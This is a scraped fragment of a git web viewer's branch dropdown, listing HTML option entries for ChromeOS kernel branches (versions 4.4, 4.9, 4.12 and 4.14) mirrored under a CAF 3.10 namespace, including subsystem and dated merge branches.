-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.12-acpi'>caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.12-acpi</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.12-android'>caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.12-android</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.12-android-ashmem'>caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.12-android-ashmem</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.12-android-binder'>caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.12-android-binder</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.12-android-dm'>caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.12-android-dm</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.12-android-net'>caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.12-android-net</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.12-android-netfilter'>caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.12-android-netfilter</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.12-android-sdcardfs'>caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.12-android-sdcardfs</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.12-android-security'>caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.12-android-security</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.12-android-uid'>caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.12-android-uid</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.12-android-usb'>caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.12-android-usb</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.12-asoc'>caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.12-asoc</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.12-asoc-intel'>caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.12-asoc-intel</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.12-backlight'>caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.12-backlight</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.12-base'>caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.12-base</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.12-base+stable'>caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.12-base+stable</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.12-base+upstream'>caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.12-base+upstream</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.12-binder'>caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.12-binder</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.12-binder-170916'>caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.12-binder-170916</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.12-bluetooth'>caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.12-bluetooth</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.12-chromeos'>caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.12-chromeos</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.12-clang'>caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.12-clang</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.12-cpufreq'>caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.12-cpufreq</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.12-cros-android'>caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.12-cros-android</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.12-cros-collabora'>caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.12-cros-collabora</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.12-cros-collabora-fixup'>caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.12-cros-collabora-fixup</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.12-dm'>caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.12-dm</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.12-driver-base'>caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.12-driver-base</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.12-drm'>caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.12-drm</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.12-drm-analogix'>caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.12-drm-analogix</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.12-drm-evdi'>caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.12-drm-evdi</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.12-fs'>caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.12-fs</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.12-hid'>caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.12-hid</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.12-i915'>caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.12-i915</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.12-iio'>caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.12-iio</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.12-input'>caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.12-input</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.12-kahlee'>caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.12-kahlee</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.12-lowmem+mm'>caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.12-lowmem+mm</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.12-media'>caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.12-media</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.12-memconsole'>caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.12-memconsole</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.12-merge-170712'>caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.12-merge-170712</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.12-merge-170714'>caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.12-merge-170714</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.12-merge-170719'>caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.12-merge-170719</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.12-merge-170720'>caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.12-merge-170720</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.12-merge-170721'>caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.12-merge-170721</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.12-merge-170725'>caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.12-merge-170725</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.12-merge-170802'>caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.12-merge-170802</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.12-merge-170803'>caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.12-merge-170803</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.12-merge-170804'>caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.12-merge-170804</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.12-merge-170807'>caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.12-merge-170807</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.12-merge-170808'>caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.12-merge-170808</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.12-merge-170809'>caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.12-merge-170809</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.12-merge-170814'>caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.12-merge-170814</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.12-merge-170815'>caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.12-merge-170815</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.12-merge-170816'>caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.12-merge-170816</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.12-merge-170817'>caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.12-merge-170817</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.12-merge-170818'>caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.12-merge-170818</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.12-merge-170828'>caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.12-merge-170828</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.12-merge-170829'>caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.12-merge-170829</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.12-merge-170830'>caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.12-merge-170830</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.12-merge-170831'>caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.12-merge-170831</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.12-merge-170901'>caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.12-merge-170901</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.12-merge-170907'>caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.12-merge-170907</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.12-merge-170908'>caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.12-merge-170908</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.12-merge-170918'>caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.12-merge-170918</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.12-merge-latest'>caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.12-merge-latest</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.12-merge-normalize'>caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.12-merge-normalize</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.12-mfd'>caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.12-mfd</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.12-misc'>caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.12-misc</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.12-mmc'>caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.12-mmc</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.12-mtd'>caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.12-mtd</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.12-net'>caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.12-net</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.12-normalize'>caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.12-normalize</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.12-pci'>caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.12-pci</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.12-pm'>caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.12-pm</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.12-regulator'>caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.12-regulator</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.12-sched'>caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.12-sched</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.12-scsi'>caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.12-scsi</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.12-security'>caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.12-security</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.12-sysrq'>caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.12-sysrq</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.12-thermal'>caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.12-thermal</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.12-tpm'>caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.12-tpm</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.12-tps68470'>caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.12-tps68470</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.12-typec'>caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.12-typec</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.12-usb'>caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.12-usb</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.12-wireless'>caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.12-wireless</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.12-x86'>caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.12-x86</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.14-acpi'>caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.14-acpi</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.14-android'>caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.14-android</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.14-arm64'>caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.14-arm64</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.14-backlight'>caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.14-backlight</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.14-base'>caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.14-base</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.14-binder'>caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.14-binder</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.14-bluetooth'>caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.14-bluetooth</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.14-chromeos'>caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.14-chromeos</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.14-cpufreq'>caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.14-cpufreq</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.14-cros_ec'>caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.14-cros_ec</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.14-dm-verity'>caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.14-dm-verity</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.14-driver-core'>caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.14-driver-core</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.14-drm'>caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.14-drm</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.14-fs'>caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.14-fs</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.14-iio'>caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.14-iio</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.14-input'>caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.14-input</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.14-lowmem'>caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.14-lowmem</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.14-media'>caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.14-media</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.14-merge-171026'>caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.14-merge-171026</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.14-merge-171027'>caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.14-merge-171027</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.14-merge-171030'>caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.14-merge-171030</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.14-merge-171031'>caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.14-merge-171031</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.14-merge-171101'>caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.14-merge-171101</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.14-merge-171101-2'>caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.14-merge-171101-2</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.14-merge-171101-3'>caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.14-merge-171101-3</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.14-merge-171102'>caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.14-merge-171102</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.14-merge-171103'>caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.14-merge-171103</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.14-merge-171106'>caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.14-merge-171106</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.14-merge-normalize'>caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.14-merge-normalize</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.14-misc'>caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.14-misc</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.14-mmc'>caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.14-mmc</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.14-mtd'>caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.14-mtd</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.14-net'>caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.14-net</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.14-net-lannm'>caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.14-net-lannm</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.14-pcie'>caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.14-pcie</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.14-pm'>caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.14-pm</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.14-pstore'>caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.14-pstore</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.14-regulator'>caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.14-regulator</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.14-sched'>caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.14-sched</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.14-scsi'>caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.14-scsi</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.14-security'>caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.14-security</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.14-security-groeck'>caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.14-security-groeck</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.14-sound'>caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.14-sound</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.14-sysrq'>caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.14-sysrq</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.14-thermal'>caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.14-thermal</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.14-tpm'>caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.14-tpm</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.14-usb'>caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.14-usb</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.14-wireless'>caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.14-wireless</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.14-x86'>caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.14-x86</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.4'>caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.4</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.9-acpi'>caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.9-acpi</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.9-asoc'>caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.9-asoc</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.9-backlight'>caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.9-backlight</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.9-base'>caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.9-base</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.9-base+upstream'>caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.9-base+upstream</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.9-bluetooth'>caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.9-bluetooth</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.9-chromeos'>caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.9-chromeos</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.9-cpufreq'>caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.9-cpufreq</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.9-cros'>caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.9-cros</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.9-dm'>caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.9-dm</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.9-dmabuf'>caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.9-dmabuf</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.9-driver-base'>caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.9-driver-base</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.9-drm'>caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.9-drm</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.9-fs'>caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.9-fs</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.9-hid'>caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.9-hid</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.9-i915'>caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.9-i915</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.9-i915+dmabuf'>caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.9-i915+dmabuf</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.9-i915+drm'>caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.9-i915+drm</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.9-iio'>caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.9-iio</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.9-input'>caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.9-input</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.9-lowmem+mm'>caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.9-lowmem+mm</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.9-memconsole'>caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.9-memconsole</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.9-merge'>caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.9-merge</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.9-merge-170411'>caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.9-merge-170411</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.9-merge-170412'>caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.9-merge-170412</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.9-merge-170414'>caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.9-merge-170414</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.9-merge-170418'>caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.9-merge-170418</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.9-merge-170419'>caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.9-merge-170419</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.9-merge-170425'>caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.9-merge-170425</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.9-merge-170501'>caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.9-merge-170501</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.9-merge-170505'>caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.9-merge-170505</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.9-merge-170516'>caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.9-merge-170516</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.9-merge-170517'>caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.9-merge-170517</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.9-merge-170518'>caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.9-merge-170518</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.9-merge-170612'>caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.9-merge-170612</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.9-merge-170613'>caf/3.10/caf/chromium-googlesource-kernel-next/chromeos-4.9-merge-170613</option>
